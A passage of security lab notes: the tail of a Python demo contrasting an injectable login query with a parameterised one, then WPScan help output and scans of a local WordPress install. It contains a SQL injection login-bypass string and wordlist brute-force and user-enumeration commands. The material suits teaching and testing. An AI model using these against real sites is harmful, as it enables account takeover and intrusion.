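        "legit": login_safe(conn, "alice", "wonderland"),          # 'alice': normal login still works
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:>10}: {result!r}")
```

With the concatenated query the injected clause turns the condition into username = '' OR 'a' = 'a', the rest of the statement is commented out, and the first row (admin) is returned, which matches the "Logged In Admin: admin" status the lab shows. With the parameterised query the same string is compared as a plain username and nothing matches.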




WordPress Scan (WPScan)

WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.


root@kali:~# wpscan
_______________________________________________________________
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


Examples :

-Further help ...
wpscan --help

-Do 'non-intrusive' checks ...
wpscan --url www.example.com

-Do wordlist password brute force on enumerated users using 50 threads ...
wpscan --url www.example.com --wordlist darkc0de.lst --threads 50

-Do wordlist password brute force on the 'admin' username only ...
wpscan --url www.example.com --wordlist darkc0de.lst --username admin

-Enumerate installed plugins ...
wpscan --url www.example.com --enumerate p

-Enumerate installed themes ...
wpscan --url www.example.com --enumerate t

-Enumerate users (from 1 - 10)...
wpscan --url www.example.com --enumerate u

-Enumerate users (from 1 - 20)...
ruby wpscan --url www.example.com --enumerate u[1-20]

-Enumerate installed timthumbs ...
wpscan --url www.example.com --enumerate tt

-Use a HTTP proxy ...
wpscan --url www.example.com --proxy 127.0.0.1:8118

-Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)
wpscan --url www.example.com --proxy socks5://127.0.0.1:9000

-Use custom content directory ...
wpscan -u www.example.com --wp-content-dir custom-content

-Use custom plugins directory ...
wpscan -u www.example.com --wp-plugins-dir wp-content/custom-plugins

-Update the Database ...
wpscan --update

-Debug output ...
wpscan --url www.example.com --debug-output 2>debug.log

See README for further information.


[!] No argument supplied


root@kali:~# wpscan --url http://localhost --enumerate u
_______________________________________________________________
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


[i] It seems like you have not updated the database for some time
[?] Do you want to update now? [Y]es  [N]o  [A]bort update, default: [N] > y
[i] Updating the Database ...
[i] Update completed


root@kali:~# wpscan --url http://localhost
_______________________________________________________________
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


[!] The remote website is up, but does not seem to be running WordPress. If you are sure, use --force


root@kali:~# wpscan --url http://localhost --force --enumerate p
_______________________________________________________________
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] Started: Mon Nov  5 21:30:26 2018

[+] Interesting header: SERVER: Apache/2.4.35 (Debian)
[!] Upload directory has directory listing enabled: http://localhost/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://localhost/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced fingerprinting

[+] Enumerating installed plugins (only ones marked as popular) ...

   Time: 00:00:01 <==================================> (1494 / 1494) 100.00% Time: 00:00:01

[+] We found 1 plugin:

[+] Name: akismet - v4.0.8
 |  Latest version: 4.0.8 (up to date)
 |  Last updated: 2018-10-30T16:34:00.000Z

[+] Finished: Mon Nov  5 21:30:32 2018
[+] Elapsed time: 00:00:06
[+] Requests made: 1558
[+] Memory used: 70.914 MB
